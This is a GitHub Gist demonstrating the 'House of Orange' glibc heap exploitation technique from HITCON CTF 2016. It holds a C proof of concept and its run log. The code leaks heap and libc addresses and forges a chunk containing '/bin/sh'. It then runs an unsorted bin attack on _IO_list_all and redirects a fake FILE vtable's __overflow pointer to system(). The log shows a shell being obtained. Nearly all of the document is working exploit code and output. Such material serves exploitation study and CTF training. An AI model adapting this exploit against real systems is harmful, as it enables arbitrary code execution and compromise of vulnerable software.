Last active
December 22, 2017 16:16
-
-
Save inaz2/b1f6f599456259bd1804b6c4c1449428 to your computer and use it in GitHub Desktop.
House of Orange attack / http://4ngelboy.blogspot.jp/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ gcc house_of_orange.c -o house_of_orange | |
house_of_orange.c: In function ‘main’: | |
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
^ | |
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x30) = -1; | |
^ | |
$ ./house_of_orange | |
[+] allocate p1, p2, p3, p4, p5 | |
[+] free p4 and p2 | |
[+] leak heap addresses | |
addr_heap = 0x19895f0 | |
addr_p2 = 0x19894b0 | |
[+] free p5 | |
[+] leak libc addresses | |
arena_top = 0x7ff6c6db0b78 | |
libc_base = 0x7ff6c69ed000 | |
libc_system = 0x7ff6c6a32380 | |
libc_IO_list_all = 0x7ff6c6db1520 | |
[+] abuse p1 overflow | |
[+] allocate p6 | |
*** Error in `./house_of_orange': malloc(): memory corruption: 0x00007ff6c6db1520 *** | |
======= Backtrace: ========= | |
/lib/x86_64-linux-gnu/libc.so.6(+0x77725)[0x7ff6c6a64725] | |
/lib/x86_64-linux-gnu/libc.so.6(+0x819be)[0x7ff6c6a6e9be] | |
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ff6c6a705a4] | |
./house_of_orange[0x400881] | |
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ff6c6a0d830] | |
./house_of_orange[0x400599] | |
======= Memory map: ======== | |
00400000-00401000 r-xp 00000000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange | |
00600000-00601000 r--p 00000000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange | |
00601000-00602000 rw-p 00001000 fc:00 1722079 /tmp/b1f6f599456259bd1804b6c4c1449428/house_of_orange | |
01989000-019aa000 rw-p 00000000 00:00 0 [heap] | |
7ff6c0000000-7ff6c0021000 rw-p 00000000 00:00 0 | |
7ff6c0021000-7ff6c4000000 ---p 00000000 00:00 0 | |
7ff6c67d7000-7ff6c67ed000 r-xp 00000000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1 | |
7ff6c67ed000-7ff6c69ec000 ---p 00016000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1 | |
7ff6c69ec000-7ff6c69ed000 rw-p 00015000 fc:00 262679 /lib/x86_64-linux-gnu/libgcc_s.so.1 | |
7ff6c69ed000-7ff6c6bad000 r-xp 00000000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6bad000-7ff6c6dac000 ---p 001c0000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6dac000-7ff6c6db0000 r--p 001bf000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6db0000-7ff6c6db2000 rw-p 001c3000 fc:00 262653 /lib/x86_64-linux-gnu/libc-2.23.so | |
7ff6c6db2000-7ff6c6db6000 rw-p 00000000 00:00 0 | |
7ff6c6db6000-7ff6c6ddc000 r-xp 00000000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so | |
7ff6c6fcc000-7ff6c6fcf000 rw-p 00000000 00:00 0 | |
7ff6c6fd8000-7ff6c6fdb000 rw-p 00000000 00:00 0 | |
7ff6c6fdb000-7ff6c6fdc000 r--p 00025000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so | |
7ff6c6fdc000-7ff6c6fdd000 rw-p 00026000 fc:00 262629 /lib/x86_64-linux-gnu/ld-2.23.so | |
7ff6c6fdd000-7ff6c6fde000 rw-p 00000000 00:00 0 | |
7ffd8137a000-7ffd8139b000 rw-p 00000000 00:00 0 [stack] | |
7ffd813e3000-7ffd813e5000 r--p 00000000 00:00 0 [vvar] | |
7ffd813e5000-7ffd813e7000 r-xp 00000000 00:00 0 [vdso] | |
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] | |
$ id | |
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker) | |
$ | |
Aborted (core dumped) | |
$ /lib/x86_64-linux-gnu/libc.so.6 | |
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al. | |
Copyright (C) 2016 Free Software Foundation, Inc. | |
This is free software; see the source for copying conditions. | |
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A | |
PARTICULAR PURPOSE. | |
Compiled by GNU CC version 5.3.1 20160413. | |
Available extensions: | |
crypt add-on version 2.1 by Michael Glad and others | |
GNU Libidn by Simon Josefsson | |
Native POSIX Threads Library by Ulrich Drepper et al | |
BIND-8.2.3-T5B | |
libc ABIs: UNIQUE IFUNC | |
For bug reporting instructions, please see: | |
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
int main() | |
{ | |
puts("[+] allocate p1, p2, p3, p4, p5"); | |
char *p1 = malloc(0x80); | |
char *p2 = malloc(0x90); | |
char *p3 = malloc(0xa0); | |
char *p4 = malloc(0xb0); | |
char *p5 = malloc(0xc0); | |
puts("\n[+] free p4 and p2"); | |
free(p4); | |
free(p2); | |
puts("\n[+] leak heap addresses"); | |
char *addr_heap = *(void **)p2; | |
char *addr_p2 = addr_heap - 0x140; | |
printf("addr_heap = %p\n", addr_heap); | |
printf("addr_p2 = %p\n", addr_p2); | |
puts("\n[+] free p5"); | |
free(p5); | |
puts("\n[+] leak libc addresses"); | |
char *arena_top = *(void **)p2; | |
char *libc_base = arena_top - 0x3c3b78; | |
char *libc_system = libc_base + 0x45380; | |
char *libc_IO_list_all = libc_base + 0x3c4520; | |
printf("arena_top = %p\n", arena_top); | |
printf("libc_base = %p\n", libc_base); | |
printf("libc_system = %p\n", libc_system); | |
printf("libc_IO_list_all = %p\n", libc_IO_list_all); | |
puts("\n[+] abuse p1 overflow"); | |
memcpy(p1+0x80, "/bin/sh\x00", 8); /* first arg of __overflow() */ | |
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
*(void **)(p1+0x80+0x18) = libc_IO_list_all-0x10; /* unsorted bin attack */ | |
*(void **)(p1+0x80+0x28) = libc_system; /* vtable->__overflow */ | |
*(void **)(p1+0x80+0x30) = -1; | |
*(void **)(p1+0x80+0xa0) = addr_p2; /* _chain->vtable */ | |
*(void **)(p1+0x80+0xd8) = addr_p2; /* _IO_list_all->file->_chain */ | |
puts("\n[+] allocate p6"); | |
char *p6 = malloc(0xd0); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment